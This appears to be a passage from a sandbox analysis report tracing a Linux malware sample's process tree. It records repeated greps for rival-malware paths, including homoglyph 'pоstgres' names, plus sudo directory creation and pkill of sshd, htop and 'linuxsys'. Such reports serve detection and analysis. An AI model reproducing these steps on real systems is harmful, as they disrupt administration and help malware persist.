  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1244
- /bin/grep
  grep exe
  2⤵
  PID:1247
- /bin/ls
  ls -latrh /proc/key-users
  2⤵
  PID:1246
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1249
- /bin/ls
  ls -latrh /proc/kmsg
  2⤵
  PID:1251
- /bin/grep
  grep exe
  2⤵
  PID:1252
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1254
- /bin/ls
  ls -latrh /proc/kpagecgroup
  2⤵
  PID:1256
- /bin/grep
  grep exe
  2⤵
  PID:1257
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1259
- /bin/ls
  ls -latrh /proc/kpagecount
  2⤵
  PID:1261
- /bin/grep
  grep exe
  2⤵
  PID:1262
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1264
- /bin/ls
  ls -latrh /proc/kpageflags
  2⤵
  PID:1266
- /bin/grep
  grep exe
  2⤵
  PID:1267
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1269
- /bin/ls
  ls -latrh /proc/loadavg
  2⤵
  PID:1271
- /bin/grep
  grep exe
  2⤵
  PID:1272
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1274
- /bin/grep
  grep exe
  2⤵
  PID:1277
- /bin/ls
  ls -latrh /proc/locks
  2⤵
  PID:1276
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1279
- /bin/grep
  grep exe
  2⤵
  PID:1282
- /bin/ls
  ls -latrh /proc/meminfo
  2⤵
  PID:1281
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1284
- /bin/ls
  ls -latrh /proc/misc
  2⤵
  PID:1286
- /bin/grep
  grep exe
  2⤵
  PID:1287
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1289
- /bin/grep
  grep exe
  2⤵
  PID:1292
- /bin/ls
  ls -latrh /proc/modules
  2⤵
  PID:1291
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1294
- /bin/ls
  ls -latrh /proc/mounts
  2⤵
  PID:1296
- /bin/grep
  grep exe
  2⤵
  PID:1297
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1301
- /bin/grep
  grep exe
  2⤵
  PID:1304
- /bin/ls
  ls -latrh /proc/net
  2⤵
  PID:1303
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1307
- /bin/grep
  grep exe
  2⤵
  PID:1311
- /bin/ls
  ls -latrh /proc/pagetypeinfo
  2⤵
  PID:1310
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1313
- /bin/grep
  grep exe
  2⤵
  PID:1317
- /bin/ls
  ls -latrh /proc/partitions
  2⤵
  PID:1316
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1320
- /bin/grep
  grep exe
  2⤵
  PID:1323
- /bin/ls
  ls -latrh /proc/sched_debug
  2⤵
  PID:1322
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1326
- /bin/grep
  grep exe
  2⤵
  PID:1330
- /bin/ls
  ls -latrh /proc/schedstat
  2⤵
  PID:1329
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1332
- /bin/grep
  grep exe
  2⤵
  PID:1336
- /bin/ls
  ls -latrh /proc/self
  2⤵
  PID:1335
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1339
- /bin/grep
  grep exe
  2⤵
  PID:1342
- /bin/ls
  ls -latrh /proc/slabinfo
  2⤵
  PID:1341
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1345
- /bin/ls
  ls -latrh /proc/softirqs
  2⤵
  PID:1348
- /bin/grep
  grep exe
  2⤵
  PID:1349
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1351
- /bin/grep
  grep exe
  2⤵
  PID:1355
- /bin/ls
  ls -latrh /proc/stat
  2⤵
  PID:1354
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1358
- /bin/ls
  ls -latrh /proc/swaps
  2⤵
  PID:1360
- /bin/grep
  grep exe
  2⤵
  PID:1361
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1364
- /bin/ls
  ls -latrh /proc/sys
  2⤵
  PID:1367
- /bin/grep
  grep exe
  2⤵
  PID:1368
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1371
- /bin/ls
  ls -latrh /proc/sysrq-trigger
  2⤵
  PID:1373
- /bin/grep
  grep exe
  2⤵
  PID:1374
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1377
- /bin/grep
  grep exe
  2⤵
  PID:1380
- /bin/ls
  ls -latrh /proc/sysvipc
  2⤵
  - System Network Configuration Discovery
  PID:1379
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1384
- /bin/grep
  grep exe
  2⤵
  PID:1387
- /bin/ls
  ls -latrh /proc/thread-self
  2⤵
  PID:1386
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1390
- /bin/grep
  grep exe
  2⤵
  PID:1394
- /bin/ls
  ls -latrh /proc/timer_list
  2⤵
  PID:1393
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1396
- /bin/ls
  ls -latrh /proc/tty
  2⤵
  PID:1399
- /bin/grep
  grep exe
  2⤵
  PID:1400
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1403
- /bin/grep
  grep exe
  2⤵
  PID:1406
- /bin/ls
  ls -latrh /proc/uptime
  2⤵
  PID:1405
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1409
- /bin/grep
  grep exe
  2⤵
  PID:1413
- /bin/ls
  ls -latrh /proc/version
  2⤵
  PID:1412
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1415
- /bin/ls
  ls -latrh /proc/vmallocinfo
  2⤵
  PID:1418
- /bin/grep
  grep exe
  2⤵
  PID:1419
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1422
- /bin/grep
  grep exe
  2⤵
  PID:1425
- /bin/ls
  ls -latrh /proc/vmstat
  2⤵
  PID:1424
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1428
- /bin/grep
  grep exe
  2⤵
  PID:1432
- /bin/ls
  ls -latrh /proc/zoneinfo
  2⤵
  PID:1431
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1434
- /usr/bin/id
  id -u
  2⤵
  PID:1435
- /usr/bin/sudo
  sudo mkdir /etc/data
  2⤵
  - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
  PID:1436
- - /usr/sbin/sendmail
    sendmail -t
    3⤵
    PID:1439
  - - /usr/sbin/exim4
      /usr/sbin/exim4 -Mc 1tmNfK-0000ND-O5
      4⤵
      Reads CPU attributes
      PID:1452
- - /usr/sbin/sendmail
    sendmail -t
    3⤵
    PID:1442
  - - /usr/sbin/exim4
      /usr/sbin/exim4 -Mc 1tmNfK-0000NG-O3
      4⤵
      Reads CPU attributes
      PID:1453
- - /bin/mkdir
    mkdir /etc/data
    3⤵
    PID:1443
- /usr/bin/id
  id -u
  2⤵
  PID:1444
- /bin/uname
  uname -i
  2⤵
  - Attempts to change immutable files
  PID:1445
- /bin/uname
  uname -m
  2⤵
  PID:1446
- /bin/grep
  grep -e /dev
  2⤵
  PID:1449
- /bin/grep
  grep -v grep
  2⤵
  PID:1450
- /bin/ls
  ls -la /etc/data
  2⤵
  PID:1448
- /usr/bin/pkill
  pkill -f sshd
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1451
- /usr/bin/pkill
  pkill -f htop
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1454
- /usr/bin/pkill
  pkill -f linuxsys
  2⤵
  - Reads CPU attributes
  PID:1456
